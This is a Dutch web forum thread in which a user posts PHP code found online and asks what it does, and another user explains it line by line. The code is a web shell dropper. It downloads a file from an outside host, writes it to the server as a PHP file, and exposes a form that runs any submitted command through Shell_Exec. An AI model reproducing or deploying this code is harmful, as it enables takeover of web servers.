• Ik kwam dit tegen op het internet en ik ben nieuwsgierig wat het inhoudt, kan iemand me uitleggen? maakt niet uit hier, of via pm ;)


    PHP
    <?php $shell=@file_get_contents("http://ckhostingsolutions.com/templates/beez/template.txt"); $fw=@fopen("ram0b64.php","w"); fputs ($fw, $shell); fclose($fw); ?><html><head><title>load1.php</title></head><onload="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>

    O o
    /¯/__________________________/¯¯
    | <๖ۣۜJunior Front-end Webdeveloper/>
    \_\¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__
    /||\
    /¯\
    Never be afraid to try something new. Remember that a lone amateur built the Ark. A large group of professionals built the Titanic.

  • PHP
    $shell=@file_get_contents("http://ckhostingsolutions.com/templates/beez/template.txt");


    Pakt letterlijk de pagina en stopt die in een variabele.

    PHP
    $fw=@fopen("ram0b64.php","w");


    Opent een bestand zodanig dat het writable is.

    PHP
    fputs ($fw, $shell);


    Doet de content van de pas geopende pagina in de file.

    PHP
    fclose($fw);


    Sluit het bestand.


    Waar het HTML gedoe opslaat, geen idee.

    PHP
    Shell_Exec($cmd);


    Voert een commando uit op de server.

  • idk ik zag eerngister op school die link tijdens het surfen op het internet(iets met user agent), en bij een test area zag ik die code staan dus heb ik m gekoppieerd (xD) waar zou iemand zoiets voor gebruiken?

    O o
    /¯/__________________________/¯¯
    | <๖ۣۜJunior Front-end Webdeveloper/>
    \_\¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__
    /||\
    /¯\
    Never be afraid to try something new. Remember that a lone amateur built the Ark. A large group of professionals built the Titanic.

Participate now!

Heb je nog geen account? Registreer je nu en word deel van onze community!